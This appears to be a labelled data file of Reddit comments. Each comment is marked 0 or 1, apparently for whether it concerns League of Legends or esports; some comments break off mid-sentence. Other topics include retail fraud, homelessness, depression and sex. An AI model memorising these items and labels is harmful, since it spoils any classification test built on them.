1	My motivation? I love this game. The plays, the shameful fails, the laughs and giggles when something unexpected happens, I feel so immersed in the game when I play it, a rare experience for me.   With most games, they don't capture my attention, I can pause them (if they're pause-able) or just step away from them so easily, I have time to answer text messages and little things like that. But this game, it captures my emotion, once I start a game, I can't look away, I often forget that I received a text message or ignored a phone call while playing.... the game captures me.   Also I play a lot of dominion, I like the game mode better and the community that plays dominion is much smaller. I often run into the same players over and over again like how I see high elo streamers running into Fabyyy, SilSol, Arthelon, and other soloque stars. I really enjoy when I enter into a game with someone I have played with or against before. Playing games with these guys, after they've played with and against me in so many games, its really enjoyable and I hope that I'll some day be among the dominion stars.
1	I said great point because he did make one - that people are willing to overlook a story's credibility because it doesn't have a specific name attached to it, especially in eSports journalism.   Why? Because this is a largely teen/young adult audience who're reading these kinds of articles and they don't realise the repercussions of someone revealing this kind of sensitive information about someone.   Furthermore, as a big pro-wrestling fan, I tend to read websites which are known as 'dirtsheets'. Nearly everyday a story comes from an 'unknown source' who 'claims he saw X speaking to Y' and speculation posts literally fill these sites and get them the ad revenue they need. This is the type of 'journalism' that causes people to be wary of unnamed sources.   Now finding someone brave enough to name and shame AND name themselves, I understand that's really hard to do so I get why you use anonymous sources. Anonymity is a massive factor in journalism and something I support entirely.   You only have to look to the backlash to Olly of Millenium as to why people don't reveal themselves when these kinds of stories get out is because the same community that stands up for facts and doing what's right by the pros (be they players, managers, journos, casters, etc.) can be the same one to destroy their reputation.   Do I think it ruins your integrity? No. Like I said I can't remember off the top of my head you having to print a retraction. Also, the fact of the matter is, you wouldn't print something you knew you couldn't back up in court with proof if it ever got that far. That's Journalism 101.   I honestly don't think we're too far from that moment of someone being sued for what they've written but that's another topic for another time.
0	Oh man I had one of these when I worked in big box retail. It was the most gratifying experience ever.   We had the same policy, where we weren't allowed to ask for ID unless explicitly requested by the POS.   We're closing up shop for the evening, for reference 8pm. 8:03 rolls around, and the tumbleweeds are rolling through the store, save for one single soul. She casually meanders up to the counter with nearing a thousand dollars worth of electronics. Carefully lying them on the counter, she willingly, no,  boastfully  lays out her credit card and ID on the counter (and of course they matched - why else would she offer). Now, our POS had a security feature where we were required to manually type in the last 4 digits printed on the card (in order to verify that they matched up with the number that was actually read from the magnetic strip). Of course it didn't.  Cue excitement. , and she was, of course, no less than shocked that I was unable to process her transaction.   She huffed and begrudgingly agreed to try her "daughters" card (who was outside waiting and came in to assist - they couldn't have been more than 10 years different in age, but who am I to judge). Surprise, same issue.   Lady is "baffled," so I tell her I can enter the card number manually (the one on the front of the card). She disdainfully agrees.   I do it, only to be prompted by the POS to call the merchant to authorize the transaction. I can barely contain my excitement. I am rarely ever afforded the opportunity to shut someone down so hard (mostly because any sane swindler would have put a stop to it at this point) so of course I jumped at the chance. Yet again, she tells me that I have to sell her this stuff and that it is somehow an issue with our register.   I cheerfully dialed the merchants 800-number, maintaining what she thought to be my most diligent customer-service smile, when in reality, I was struggling to contain my fit of maniacal laughter.   I follow the phone representatives instructions to the letter, matching IDs, reading account numbers (several times), ID numbers, names, et al.   After about 15 minutes of this, the lady on the other line drops the bomb shell, and I almost exploded with excitement:   "The name on her ID is  definitely  not the name associated with the account."   I relay the information to the customer.   "Well, it could be in my husbands name."   I give his name to the representative.   "Yeah, that's definitely not it either."   Once more, I manage to express shock and dismay to the con-woman and her "daughter," explaining that I "completely understand her frustration and have no idea how this could happen." All the while, in my head, the excitement was nearing on oozing out of my nose.   "Oh, well, I'll have to call the bank and sort this out!" she huffed, and out the door she went, itemless.   The fun I had at the audacity and stupidity of this woman and her cohort was well worth the extra 20 minutes past closing, plus returning the unsold merchandise to the shelf.
1	In all honesty, ADC is very similar to each other in laning phase. Exceptions:     Ezreal and to some extent Caitlyn. You focus on farming but also extensive poking of the enemy laners.   Graves/Lucian/earlygame ADC. You play aggressive and look for early kills with the help of your support.   Anything else; play farmville. Look for openings as your support provides them.     No matter what, a substantial portion of your time is consumed by attacking minions.   What really indicates the flavor of a lane is who the supports are.     Support is Soraka; expect to farm for days and simply outlast the enemy laners.   Support is Blitzcrank; expect to immediately change from farming mode to "do damage to this guy who just got pulled".   Support is Sona; expect her to poke them down low and zone them off the waves.     To be clear, each ADC has different powers; but at the end of the day their role is to take down buildings and apply sustained DPS. Early game, all the ADC will do is farm and look for enemy mistakes/follow the support's initiation. No ADC really changes how a lane "feels" for the enemy^(limited exceptions). It's the support that usually does that.
0	I agree with you.  I think people are equating having money/stuff to happiness incorrectly.  Happiness is a state of mind and body, not having stuff.  All extra money does it help you live easier.  Once you have a enough to live comfortably (different definition for everybody) I don't see extra making you happier.
0	Hi everyone, I work a lot with the homeless on my college campus, so I'd like to weigh in. Most of my information is based off of conversations with either homeless people or those who were formerly homeless.   mjq03 here is mostly right. There are scams out there, but even beyond that, there are two reasons that I will never give a dime to a homeless person begging for change. For one, you don't know what they're going to spend it on. Yes, it's probably wrong to assume they'll all blow it on booze and weed, but it is equally irresponsible to assume that they won't. It's not helping them to fuel a harmful habit. Secondly, you can't try to differentiate who will spend money responsibly and who won't. You'll drive yourself nuts.   If you really want to help, there are two things I say that you can do. For one  strike up a conversation . Homeless people are people too, and they won't bite. The ones who are ornery and crabby won't exactly attack you, they'll tell you to piss off if they want to be left alone. But nine times out of ten, they're itching for someone to talk to. A lot of times a smile and a friendly conversation can be just as fulfilling as a sandwich. Secondly,  refer them somewhere that can help them, like a social service center . Note I did not say shelter. A lot of homeless will refuse to go to a shelter because it's demeaning, and they are clinging on to their pride. And they should. They damn well need it. But a social service center nearby will work with them to get them off the streets, by helping them with the proper forms and registrations, to employment counseling, to even rehab services or psychiatric help if needed. Some places in L.A. that I commonly refer people to are [St. Joseph Center For The Homeless]( in Venice or [Blessed Sacrament Church]( in West Hollywood, and sometimes Midnight Mission, although from what I understand, they do things a little differently.   If you don't want to take the time to help them, or are in a hurry, or just have better things to do, that's fine also. Nobody's asking anyone to be the hero. But please, do not swear, or spit, or be an asshole to them. I've seen people be driven into deep depressions by being constantly ridiculed for being homeless. If you don't have the time to help, then why waste your time being an ass?   Lastly, I'd like to say that I do not feel sorry for homeless people, and nobody should have to. Yes, they've fallen on hard times, but whether it's their fault or not, they don't want you to feel sorry for them, and the only reason they'll lead you to believe that is because they're asking for money. There's nothing wrong with saying "No, I don't have any cash on me, but hey, how's your day going?" While it's a little intimidating at first, you'd be surprised how well received it is. I've met people begging customers for their spare change outside of a Ralph's, and then seen them at some of the places where I volunteer the next week. It's truly powerful.
0	That's not exactly how goodwill works. They don't hire disabled people to work for them for under minimum wage. It's part of their mission statement to provide employment opportunities for people who may find it difficult to get a job. So they offer programs for severely disabled people where they pick them up from their homes and feed them and basically get them out of the house and give them a purpose for awhile. Do they pay them minimum wage? No. But they do pay them and if they paid them more they would lose their disability from the government which is much more than a minimum wage part time job.
0	I don't want trigger warnings to protect myself from   > bullies, insults, and assholes   I'm recovering from suicidal depression, and I have a limited amount of energy to handle the kind of shit that made me want to kill myself before I need someone to hide the knives. I want to use that energy to tolerate the unavoidable (your aforementioned "bullies, insults, and assholes"), instead of being blindsided by what was advertised as a heartwarming story about a chocolate shop. In terms of negative psychological impact, there's a huge difference between hearing the words "abusive marriage" and seeing a bruised woman cry because she is terrified of her husband. With my brain, I can either deal with my everyday stressors (work, family, broken car, etc.), OR I can watch  Chocolat . If I overload, I have to stop myself from walking into traffic. So if I can walk away before it gets to that point, it doesn't just mean I don't feel bad - it means I get to keep my job, because I can trust myself to leave the house.   Given the millions of people who have the same disorder, and the fact that medication only works 30% of the time, I don't think a single word of warning, something I look up on my own whenever possible, is unreasonable. I think it's merciful, and it has allowed me to recover much faster than I'd have been able to otherwise. It's not really any different from having braille on elevator buttons, or allergy warnings in restaurants. It harms nobody, and enables me to have something approaching a normal life.
1	Well there are several things that are wrong with this, one of them being the attempt to get ROCCAT to come out(why even an EU team). June interferes with LCS so that knocks out any pro team out from flying to this convention.  Second, seeing that there isn't remotely even close to as much enthusiasm towards this compared to West Coast events, I just don't see sponsors wanting to back something that would possibly be a flop, it's just a bad move that would likely turn into a loss.  Lastly, with 15K I honestly don't see much being available if that goal is even reached.  Notes: Out of 1,000 responses I'm assuming it was practically all East Coast responses and I see no reason as to why someone wouldn't want it to happen. People volunteering to help out? It's a convention, people are going to want to come for either the free ticket, free swag, or just being a part of it, typically not out of the goodness of their heart. Last, no one knows anyone on the team that's putting this on, why would they spend $1,000 to meet up with them?
0	I'm a guy that has been told I'm huge by some and ok by others.   But I have yet to find a girl who couldn't take me completely after she got comfy with it. Just take your time and go slow. Let her decide depth and speed and don't push for more. Before you know it she will be enjoying it and she will be pushing it further.   Heck even my current wife was actually afraid of my length. She had been with a guy who was around my size and he hurt her pretty bad a few times. So she was very much like "Great! More painful sex!". But now she has no issues with it and we have a son. I just wish her sex drive was higher. But that's another story
1	my two cents, which means not that much,   I think you might be starting to lose the
0	Because when bad things happen, people like to fix blame on someone or something. Specifically, someone or something they don't like or don't necessarily fully understand. They can blame drugs, religion, lack of religion, video games movies, parenting, culture, etc. But it's never, or very rarely, ALL drugs, or religions, or video games, or parenting skills, etc. It's the drugs they don't take, the religions they don't follow, the video games they don't play, or a parenting method they don't follow. It's a lot more comforting being able to convince yourself that it could never be YOUR kid who bullies a kid into suicide or goes on a shooting spree, and as long as the causes can be grossly over simplified and blame can be placed on something that doesn't cause you to change or open your mind, people will continue to blame violence on people or things that are, at best, only vaguely connected to the crime.
1	I actually completely disagree.  I think team and individual photos' should reflect the personality of the team or player.  Take imaqtpie for example, he's know as a happy-go-lucky kind of guy and his picture reflects that. Where as someone such as Saint Vicious is know for being sort of a tough guy, thus his picture makes sense.  Now, do some of the photos look a bit forced, yes, but over all I think they fairly accurately display the personality of the person or team.
1	Doesn't mean patch notes wouldn't be uploaded, only by blakinola. Also, dude is pretty much talentless.
0	No joke, for my math class last semester I aced the midterms, but because they kept throwing new shit at us after the third one, and I couldn't remember all of the stuff and got a D on the final.
0	As a consumer, c'mon and lighten up a little bit. It's usually someone trying to make an effort to either make conversation or make you smile a little bit. I always ask cashiers how they are doing and tell them to have a nice day/weekend because I know the job sucks and you've probably dealt with at least one asshole that day.
0	I couldn't agree more. Nobody really cares. It's not a battle to be won. We love in a free society were people get to choose what to believe. War terminology implies force, implies making people "see the atheist light" for the truth it is.   The meme is correct, and a person has to fail pretty hard as introspection and awareness to not be able to see that this is true.
0	Yes it would save power, but you can use the same motor that's driving the car.   If you put current into the motor it will spin.  However, if the motor is spinning then it will put out current.   So when you let up off the accelerator on an electric car you're no longer feeding the motor current, but the motor is still spinning.  At this point the motor will output current that you can recollect.   The car slows down because that energy has to come from somewhere.  The kinetic energy in the motor get converted into electrical energy.   Electric machines are simply energy conversion devices.  If you convert electrical energy to kinetic energy the device is called a motor.  If you convert kinetic energy to electrical energy the same device is called a generator.
0	I don't like the fact that this somehow permits people to abuse me   It doesn't permit people to abuse you. Did you read my whole comment, or just look for a part you could whine about?   Everyone, regardless of their job, ought to be treated with basic respect. I was disrespected many times as a service worker (gas stations, food service, telephones--taking orders for a delivery business, not telemarketing). I have also been disrespected many times while being served. The two are not related beyond the simple overarching fact that many people are just assholes.
0	When I was a kid, I made 5 dollars an hour working for my dad. Hard, manual labor (digging, pipefitting, landscaping) from dawn til dusk most days. I got so excited at the end of the day thinking, man, I made 55 dollars today! And my dad would write it down every day, even had a spreadsheet that showed how much I had earned each week, and I could put it towards school or rent or a car when I was older. This saved him from having to hire another laborer, probably saved him a ton of money. And he always said I could cash it out whenever I needed something, with the restriction that I was over 18 and it wasn't something incredibly stupid like buying a boat or a platinum gangster chain or something. Well time comes for me to buy a car, and my total had gotten up to a lot of money, over 20 grand for my 5 summers lost, and I asked him for $5000 to buy a nice used car that I was extremely excited about. So I sat down to talk with him, and before I could even tell him what it was for, he said "no son, that work was for the family." Then why the fuck did you tell me I was making money? I walked out of the house pretty upset. If he would have said I was working for the family from the beginning, I wouldn't have cared. But don't lead me on thinking I'm earning money for a car I obsessed over that cost about 25% of what I made! I got a loan and bought that car, still have it, and the loan's paid off. I think I like it even better because I earned it twice in my mind. I let him ride in it once.
1	Try to always prioritize losing lanes over afk farming.   I agree with this part of your statement, but that's about it.   As a laner, if your behind, you can still just play passive. Like if your playing a very early game champ like LB then fine, you need help, but if your playing vayne, or karthus, just stay passive and wait for the late game.   A jungler getting a kill on another lane, snowballing them the same way the enemy in your lane is snowballed, that's just as important as your lane.   The REAL problem is most laners don't know how to play passive. They don't ward more, they don't play less agressive, they just play their same game.   If I snowball a different lane, and you, the lane who got beat early, passively farms better then the lane I destroyed, we win.   Lets say they have a nasus on their team, so you got ganked and died bot lane, I could care less until I shut down this nasus hard enough that he can't come back into the game.   And counter jungling comes into this too. If they have a heavy carry jungler, shutting him down is making him gank you less, or costing him more to gank you.
0	I remember back in 2004 I started a Software Engineering Degree. Took a Java Introductory Class. It all made sense to me, and wrote some really basic programs. Sort of. I followed the textbook pretty much letter for letter, but nothing ever ended up compiling. I had no idea why, and didn't particularly care. I guess it was a sign that it wasn't really meant to be what I was doing, especially since my class mates would write almost the exact same thing and theirs worked fine. I ended up getting a 12 for the class - the lowest I've ever scored in anything! Saw a careers counselor who suggested giving the humanities a go. Changed degree the next year and had 3 of the best years of my life, drinking in the tav, going to class half drunk, winging assignments. Yes I probably could have made more money had I studied harder in software engineering, but you'd be surprised how well community services pay as well.
1	Coming from Silver 4 (almost bronze) I completely disagree - this actually sounds like a fun game mode that I would really enjoy playing (yes, even as the retard in the middle).   For the sake of being nice to bronze players, can I join 4 diamond players as the adc and remove my "w" key from my keyboard? maybe I'll just use my track pad on my laptop - whatever handicap you think is necessary to demote me an extra few ladder steps (I'm pretty bad as it is).   NA - game name Jevahn.
0	And because you're driving on the hypotenuse of a right triangle, your forward speed will decrease.  If you're doing 60 mph, depending on how quick of a lane change you perform you're likely scrubbing at least 2 mph off your forward speed.  Somebody else do the math.
1	I for one love hearing the team voice chat! It would be great to have more tournaments with this feature. I would also love to have 2 streams or an option to switch between which team I'm hearing.   Alternatively you can have what F1 has and the important moments to be added to the stream. This can't be hard if you add a 1 minute delay and have people listening to the voice chats (Maybe some time in a future).
1	You sound incredibly eloquent and thoughtful. The fact that you can single handedly ignore the concept of "computer-based activities as jobs" in the modern world really shows that you are in touch with modernity. Do you realize that these guys are pro gaming because they want to? Players like RapidStar and Flame initially became pro because they failed their university entrance exams, but to withstand that regime to begin with shows that they are willing to play games that often i.e. they really enjoy that sort of thing.   To paraphrase from Cloudtemplar in his stream a year ago:   >You know, if somebody told me if he wanted to be a pro, I would by all means encourage him to come over to the gaming house for a test. A lot of people do this actually, and they all leave within 3 days. It takes more than "being good" to be a pro; you need to be able to truly enjoy it to really play 12 hours a day and not be burned out by it.   You seem to think that the korean players are mindless robots that play games for prize money (like Alex Ich and Reginald) and you are just as retarded as they are for that. Also:     Don't use "we", because a lot of people who read your post disagrees with you.   All your points are assuming that Korean pros are slaves being overworked, which is total bullshit ^   If you watch eSports for the narrative, I'm very sure you can find better ones in literature.   Sport implies competition. Sport is not a narrative. To confuse sport for one is a definitional error, making you wrong in all fronts. The EU LCS does a lot of it, which is a side-effect of them not really doing anything internationally notable for a while. If you are a strong region, you don't have to fill your region's content with narratives that take place out of the gaming scene.     By reading your post, I thought you were really literary, but honestly you just don't have the knowledge to write up posts like this.
1	You are less likely to report if you play a game, and see that it isn't so bad. 75% of the times people flame and blame in champ select because of some picks people make, and then keep being pissed for a long time. But then they play a good game, and feel less need to report them.   Granted it won't happen all the time, but adding it to reporting in champ select will just make it infinitely easier and worse to report without any reasoning. People have to wait and get bored, why not report this guy who took my champ? Oh he didn't pick a champ I like and I still have to wait a minute. Might as well report.   At the end game people just want to get the hell out of there, and only if you think it's worthy enough for someone to be report you stick around for that and put the effort in.
1	Zaunies is a orphan gang led by Viktor     Viktor progressed from bio projects (Mr. Tails or Twitch) to augmented humans (his friends) to robots (glorious revolution, blitzcrank came first but isn't mentioned)     Jinx was stolen by Twitch and became insane because of what happened to the Zaunies.     By some indiscernible method, Viktor persuades Jinx and Ekko to steal a crystal for the "glory of Zaun", when really it is to begin his glorious revolution.     The situation seen in the teaser video culminated through the aforementioned events.       Just in case someone wants an actual
0	It's a complicated historical accident, basically. Democracy was still a dirty word at the time of the founding, though that was starting to change ever so slightly, and there was no real historical precedent for representative democracy. The US model more or less helps invent that idea.   Many of the founders would have called their government 'republican' but that really wasn't particularly descriptive of a form of government, since historians today would describe a varied set of regimes as republics including Rome until Augustus, the classic English constitution, and the Italian city states of the late medieval and early modern period. We would today characterize these 'republics' as oligarchies of various kinds. And this is to say nothing of various other regimes, including absolute monarchies, which would have claimed to be republics.   What made the US model different from these other republics was primarily its source of legitimacy. In the US, legitimacy was linked to the will of the people or popular sovereignty. There was no sense that any particular class of society had a right to rule in the way claimed by the aristocracy in Europe. This is why the property restrictions on the franchise all but disappear within a generation and America embraces democracy as such during the Jacksonian era.
1	The first like 30 games I played ranked the only champion I knew how to play was Annie and I would just lock her in every game. As long as I was on Annie I could win the game and I ended up with some amazing record of like 75 to 30 with Annie but anytime I had to play someone else I would lose that game. So I ended up in like 900 elo. Then I took a  break from ranked learned how to play other roles in normals and customs with some friend and came back a few months later.I did something stupid and I removed Annie from my champion pool because people had convinced me she wasn't good. She was still my best champion and I should have stayed loyal to her, if I had I probably wouldn't have dropped to my all time low elo of 799. During season 3 I feel like I've finally started to understand how this game works a little bit and now I've made it to gold (with Annie in my roaster) and I wanna keep growing.
0	Actually, recently I had the option to choose a graduation gift. So obviously my mind went straight to a new laptop. Yet I realized what was in my parents' price range really didn't suit my wants. Also, since I'm going to college soon, and its about an hour-hour and a half transit to and from the city, I wanted something portable.   NO lie, I'm not much for Apple products, but the iPad 3 is legitimately amazing. As you said, it's faster than a netbook. In fact, its alot faster, and you can multitask without risking blowing up the thing.   The battery life is about 2-3 times longer, so about 10-12 hours, which is good for me for class because I have long days sometimes.   If a keyboard is a problem, do what I did and buy the folding keyboard case. Those things are seriously worth the money.   And as I said, its much easier carrying a 1.5 lb object, over your shoulder, on a rocky train, than a 10 pound object.   Also the display is REALLY pretty.
1	I think the problem is with the term Athlete, which implies a physical sport. Esports are more of a mental rigor, much like chess. People probably also have problems because they think that gaming == esports, i.e. 'oh if gaming is a sport my husband must be a champion' which isn't true. the problem is though that people don't realize the effort that goes into competitive esports, the mental rigors of the job, and the pure knowledge of what they are doing. These people are experts in their fields and much like Chess Grandmasters they are people who can and will be looked up to.   I agree that esports shouldn't fall under the 'Athletics' category in terms of what is actually accomplished, but my opinion is that many things shouldn't fall under the athletes/athletics umbrella. However, I think that America is taking the right step forward in making professional e-sports players recognized and helping them have an easy time to get into the country. This will be the first step in making our e-sports culture grow.
1	I do agree with this wholeheartedly that the promos that are  P1->D5 or any similar situation are completely necessary and that all other cause unneeded stress/anxiety etc. However i do think that this may be a bit fueled by the unrealistic stature of the ladder at the moment. Due to the fact that almost everyone above P3 can get placed P1 leads to an issue. Diamond/Master/Challenger players need to be able to climb back up as well and they need to play someone as there are not going to be many other D1 players at the moment, and if you think about it in this light it would actually take the mass of players that are D5 and up an incredible long time (in terms of queue times) to find players  that are the same aesthetic level but also a similar MMR from last season post-reset. I think the idea here is that the Plat 1 restriction seems a bit out of place due to the skill above that point that exists, but people in those elos still want to climb, making it a tricky balancing act on Riots part.
0	Here we have several places with two paths side by side, separated by several ft of grass. Each path painted every 30 ft or so with either a walking person or a person on a bicycle, indicating the desired use for each path. People still walk on the fucking bike path. Like 4 abreast with 2 strollers and a dog on a fucking 30' leash, completely oblivious to your surroundings style walking. Assholes. 3 fucking ft to the right is a path just for you, clearly labeled, use it.   I can accept the joggers and rollerbladers, they need room to move faster too. I just wish they would turn their music down so they don't shit themselves when bicycles whip past.
0	I didn't either, but my friends are as insanely paranoid about period hygiene as I am. Even on the worst day, the kind where you're more hemorrhaging than menstruating, we would never need to be checked because we are too insanely careful. I'm talkin' changing 'super' tampons every 20 minutes with a maxi-pad for good measure.   We also shower 3 or 4 times a day during that time of the month. It stems from the fact that the 3 of us can totally smell when other girls are on their period. Always. And we don't want to be smelled.
1	I know I'm a total fanboy but Snoopeh is the streamer that makes me enjoy the game the most.   Wickd and Snoopeh are both great players and even if Wickd has problems with the AP-aspect of the game watching them play together is awesome.   I would actually recommend everyone to focus their time on the junglers that stream. Especially when they duo queue. I always try to find saint, oddone or snoopeh when they stream. You learn so much more from a duo where one is the jungler. Timers on buffs, watching wickd settign up top for snoopeh to gank.
1	yeah flaming is never acceptable under any circumstance. if you dont like a certain player behaves just mute him and report him after the game, just do your thing and try to win. obviously that sounds much easier than it is because everybody has this tendency to leave a bit of angryness out of himself when somebody does something dumb but when you remind yourself that rule you slowly improve into that superior human being moral wise, who does not fight flame with flame but instead chose to fight flame by not acknowlidging it.   i often mention in these "soloq tips" posts that 9 out of 10 players who climb to diamond do these by naturally being more talented in the attributes necessary to be good in this game and NOT by watching and reading a lot of guides, thats not how it works. as a dia4 player in euw myself i could give you one simple rule, prioritize your team over yourself. and thats not an advice, thats something you should assume and accept yourself by playing the game and not by reading this comment. pick a tank or meta top laner instead of riven because most likely thats what your team needs more. i personally learned a lot watching competitive play and following the meta and trying to practice the metas champions and understanding why these champs are meta and this helped me a lot as a player
1	By more options, I mean, you have team (a), that only does standard setup, bans skarner, morg, etc. And only plays to the meta with which they were received. Now, you have team (b), that has more than just the standard game layout as it is now, and can choose to expand upon their own tactics by say, doing this strategy.   With that in mind, it matters not who team (a) bans, as they'll indubitably harm themselves in gearing towards trying to prevent just one facet of team (b)'s gameplay.
0	I was at a Best Buy years ago and some dude approached me while I was waiting in line to check out with a similar story; that he needed $20 for gas money because his car had run out of gas on the freeway and he didn't have his wallet on him. I told him no, sorry. Then he asks me if I can  give him a ride home . There was no way I was letting some junkie looking dude get in my car with me alone, so I made up a lie and said that I didn't have a car and had walked there. He eventually wandered off to harass other customers.   I guess security must've thrown him out, because after I had checked out and was walking out to my car, I spotted him out in the parking lot asking people out there for money. I was young and stupid and didn't want this guy to see me walk out to my car after I had told him I had walked there, so I did the dumbest thing I possibly could have: I walked around the side of the building down an infrequently used alley as if I was going to walk to the housing complex behind the store.   The guy must've spotted me, because the next thing I know he's followed me down the alley and is asking me for money again. Now I'm alone with this guy and no one else is around to help. I freak out and take out my wallet to give the guy some money (stupid move #2) and proceed to commit dumbass move #3; I open my wallet right in front of the guy with probably $600 in cash obviously visible inside.   Immediately after handing the guy a $20 bill, a cop car pulls around the other side of the building and starts driving down the alley towards us--probably called by the store after people had reported he was harassing shoppers in the lot. The guy promptly turned around and walked the other way out of the alley, and I got to contemplate how stupid I was for letting myself get taken advantage of (and also how lucky I was that I didn't get myself mugged) while I took the long way back to my car.
0	as someone who has experiences depression, anxiety, social awkwardness, and recently of a few years extreme paranoia, I have always had the option to take drugs. i avoided it with all my strength and have never taken a pill for anything, however living with these various things and taking nothing for it is a bittersweet reality on the one hand i don't do great in school, have very little friends who i believe don't like being around me, have been bullied my entire life for always being like this, and have wanted to kill my self a few times. on the other hand i have had 2 other friends (i use that term loosely) who where fairly calm but who failed a bunch of classes because they just couldn't keep themselves down, they got hooked on these anti-blank drugs did great but once they could no longer afford it one lived a enriching life of going nuts and killing himself the other robbed a convenient store and is now facing 5 years in prison. in the end at least i didn't end up like them
1	All I can really say here is you sound like a pathetic little child lmao. You realize you never had to spend a dime on this game, right? Crying about your own decisions is one of the saddest things I've ever seen. Also, have you tried to balance that many champions/roles/items etc? No... so how could you have any idea how difficult it is?
1	Anybody is talking about if we are or aren't allowed to give our opinions, is THE WAY we give our opinions what matters. The
1	If you need to win 2 games to recover LP from a single loss, your MMR is low. If you want your MMR to reset (warning you may get to be in a lower division) you need to wait for new season or transfer to another server. Your mmr might went down due to the fact you have tons of games like 1000~ or have bad streaks. I have a 52% win ratio with Plat2 (with decent MMR because I just transferred 2 months ago from EUW to NA) with 1000~ games of rank. I get from 20-28 points gain per game and lose 8-14 points  if i lose
1	i'm expecting it   but it's k, i reached my top elo this season and i'm rather proud   could have easily paid yang $300 for a plat elo job but i decided to do that shit myself   and oh, to put the icing on the cake, it was on a smurf... my main account got banned for 'report abuse' aka banned in a desperate attempt to restore faith in tribunal
0	Thats not a swastika, this is a swastika](   [This is the Nazi swastika](
1	Depends on how you play him. Can't build him squishy and run into teamfights; he'll do fucking terrible. That isn't a matter of him  scaling  badly, though; if anything, he  scales  well. He just performs poorly in teamfights on account of being so squishy.   There's three ways you can play shaco; you can mix them up a bit to suit your purpose, since often two will be applicable, one won't. If you build him right and play him appropriately, he'll be godly in lategame.   Problem is, most people build him as a squishy burst champion, and just run into teamfights.. which is an awful thing to do, yeah.     Burst. Can be good at splitpushing; items like Hydra, Statikk Shiv, Infinity Edge, and Trinity Force, are all good for this. Hydra/SS give burst (Active on hydra, passive on SS) and good clearing power for splitpushing. Infinity Edge is nice for bust in 1v1s/fights. Trinity force nice if you want to be a bit tankier. Last whisper or youmuu's, for high damage when starting a fight, or good arpen/ad for your decieve.     AS. Good at splitpushing, good at taking baron/dragon fast, good against tanky enemies. Stuff like BotRK, SS, Wit's End, Trinity Force. BotRK active is nice burst too, and obv. good for objectives. SS good clearing for splitpushing. Wit's end nice for MR. Trinity force for a bit of tankiness/burst. Nice for 1v1ing tanky DPS champs, or killing high-HP "priority targets" (Think stuff like pantheon, darius, perhaps lee sin and jax.. that sort of thing). Youmuu's/black cleaver are both nice; extra AS for 1v1s, or your clone can help stack up BC.     Build him tanky DPS. Trinity force or frozen mallet, black cleaver, get in there and be able to kill something  without dying . Useful for teamfights.       Note that I would only recommend youmuu's for early game, and would recommend selling it later.   Naturally you have a lot of things that cross over between these. AS, in particular, has items that either offer burst or survivability, or both. I might see that I can't splitpush much this game, while enemy team is squishy; I can go for a hydra, infinity edge, trinity force! Oh, enemy team is tanky, and I can't splitpush? BotRK, trinity force, wit's end. Oh, I think this team is perfect for splitpushing against, but don't know what I'll be up against over there? I'll take a statikk shiv, hydra or botrk, probably an early youmuu's, maybe a trinity force.. I've got time to decide if I want to sort out an IE or wit's end.
0	my first and most recent ex ended it ON our 1 year anniversary, was first everything, no luck since, took almost a year after the break-up to delete, i know it sounds long, still kinda think about it even though its been over a year, but she was my first, also amplified things because my father which i last saw when i was 10 (now 19, today) died 2 days after i got with her, so it was hard, been trying to keep my head up since, whatevs, life goes on. also kinda worried because she called me last year on my bday after the break up, led to false hope and expectations and even more heartbreak. worried that she might call/ might be depressed if she doesn't. more to it though, strict parents, barely saw her, etc... but still, i picked her up from school, drove her to my place, get dumped, drive her home, now anytime i hear of/from her i get super anxious
1	dude the community used to have a lot of people trying stuff then the community etablished a meta game based on all these experiment and fotm this meta is the most optimal and it offer plenty of different strat while staying inside the meta game.   People try everyday to break the meta and they fail cause the meta is strong and thats all there is to it.   your friend play solo top taric.. well INDEED HE PICKED A SUPPORT but he went top with him.   and w/e you can say taric isnt optimal top   it work he can win lane... But any support win a 1v1 lane tbh they give good gankign opportunity are hsrd to kill/gank and can farm pretty good... and even sometime can win 1v1   but the thing is that they do not scale with item /level aswell as other champion that are prefered top...   you fail to realize this game is 2 year old and the meta is the meta for a reason and your being the arrogant one claiming that we suck cause we stick to a meta we worked to establish by trying stuff   not ahvign all your timer down in lol is ok while not optimal its not as devastating as in starcraft where timing is 50% of everything you ened to know to be good even more...people in sc know theyre timing perfectly cause they need to. We do not need to know the timer of every single ward/creep/creepwave gold i shud have at x minute thus timing my b... it make you better to be able to time everythign while figthing someone else 100% of the time for creep or lane dominance...but tbh if your able to do that your pretty pro..   timer check shoudl eb separated among the team...and everybody shud know averager godl you shud have at x minute and creep wave timing other then that...
0	The weapons were given to Iraq by the United States for use in the Iran-Iraq war, and Saddam used them on the Kurds who he believed would ally with the Iranians.
1	Platinum Teams are somehow the highes League in the system, this is a bug. If u have a Diamond Team and a Plat I'll show the Plat on your friendlist and so on.
1	It doesn't matter how good he were, talking like that about yourself is... yeah, "arrogant" at least.   What I got from this Link vs. Double vs. Chauster vs. whoeverisnext thing is:
1	You're only one person : you only comprise  20% of the team.  That's not a majority. You do not have the benefit of a pre-made professional team who can elect a leader. You are all in purgatory together, and pretty much each and every one of you wants to get out. When you have five people who each have to rely on other people to determine their own fate: things can get ugly. Nearly every game in SoloQ is an example of this, whether on your team or the other, someone is pissed at someone else for "throwing" and determining their fate. People  don't like to give up control .   So what do you do, then? How do you make a gameplan? You do your best. You get so damn good at what you do that you earn the SoloQ trust. When I played Cassiopeia from 1000~ elo up, I'd firstblood the enemy laner, end up with 3-4 kills by the time I got my first blue buff, the constantly go bottom/top and secure kills. My AD Carry trusted me because I'd gotten him a double kill, and he knew it. Top liked me because I counter ganked and gave him an assist and a kill. Hell, I even kept wards up at all times and called my MIAs diligently even though I try to watch the map and not rely on people calling them. After about 10 minutes of showing people that you're reliable, and a strong player, you should [without being pretentious] be able to start making calls, politely. Most people have a sense of how the game works, so if you get a kill bottom and your toplaner is getting ganked by the jungler, you call the Dragon and people will go "Yeah! Good idea. I thought of that one too. Go me!" And they'll DO it. I gained 300 Elo in two weeks with this mentality. I'm still rising. I expect to hit 1400 soon. Then 1500. I want to be good at this game, and so do you. Why else would you be here? So  take these words and use them as you will.   I wish you all the best in your endeavors and hope to see you on the Fields of Justice soon!~   PS: Feel free to add me to chat or play some games, Oskjuvatn - NA. If anyone has anything to add or any specific ideas feel free to post them. If I'm completely out to lunch, tell me as well. I'll change it. I'm fairly sure most of the information here is at least reasonably correct. I may go over this a few more times and adjust the formatting to help deal with the whole "wall of text thing." No, there's no
0	It makes sense to have a consideration of what the swastika meant for the Nazis.  However, just because one group made it a symbol of hatred [does not change the meaning of what it represents](
